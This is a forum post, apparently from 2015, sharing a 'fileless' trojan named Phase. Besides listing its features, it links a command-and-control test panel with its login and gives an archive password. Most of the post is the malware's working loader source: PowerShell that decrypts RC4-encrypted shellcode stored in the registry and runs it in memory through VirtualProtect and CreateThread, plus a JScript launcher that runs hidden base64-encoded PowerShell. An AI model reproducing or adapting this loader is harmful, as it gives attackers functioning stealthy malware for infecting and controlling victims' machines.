Aerosol Posted January 5, 2015 Report Posted January 5, 2015 Hi,found a new trojan which call itself fileless. It injects RC4 encrypted code into explorer.exe, hooks NtQueryDirectoryFile with HLT-hook for hiding, uses (base64-decoded) Powershell stored in regedit and it's encrypted with RC4 and random key. Uses same technique as Poweliks for startup in regedit. AV-detection is very bad:https://www.virustotal.com/en/file/438258d0710ddbb280a5a1ed801392a5194eaece16ba85591fe5eb4815bf56a8/analysis/1418147310/Test Panel: http://phasesupport.com/phase/login.php - Phase:PhasePowershell script:$sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';[Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");$sCode = @"[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32.dll")]public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);[DllImport("kernel32.dll")]public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);"@$pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru[Byte[]]$bShellCode;if ([IntPtr]::Size -eq 8) { # Load Encrypted x64 Shellcode From Registry $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;}else{ # Load Encrypted x86 Shellcode From Registry $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;}[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;for ($i = 0; $i -lt 256; $i++){ $s[$i] = [Byte]$i; $k[$i] = $bKey[$i % $bKey.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++){ $j = ($j + $s[$i] + $k[$i]) % 256; $s[$i] = $s[$j]; $s[$j] = $bSwap;}$i = 0;$j = 0;for ($x = 0; $x -lt $bShellCode.Length; $x++){ $i = ($i + 1) % 256; $j = ($j + $s[$i]) % 256; $bSwap = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $bSwap; [int]$t = ($s[$i] + $s[$j]) % 256; $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];}$dwSize = $bShellCode.Length;if ($dwSize -gt 0x00000000){ [Int[]]$dwOldProt = 0x00000000; $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0) if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){ $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0); $pFunctions::WaitForSingleObject($hThread, -1); }}WSShell = new ActiveXObject("WScript.Shell"); sWindows = oWSShell.ExpandEnvironmentStrings("%windir%"); sPowerShell = sWindows + "\\system32\\windowspowershell\\v1.0\\powershell.exe"; oFile = new ActiveXObject("Scripting.FileSystemObject"); if (oFile.FileExists(sPowerShell)){ (oWSShell.Environment("Process"))("LoadShellCodeScript") = "iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('" + sPowerShellScript + "')))"; oWSShell.Run(sPowerShell + " iex $env:LoadShellCodeScript", 0, 1);}phasepass: infectedSource Quote
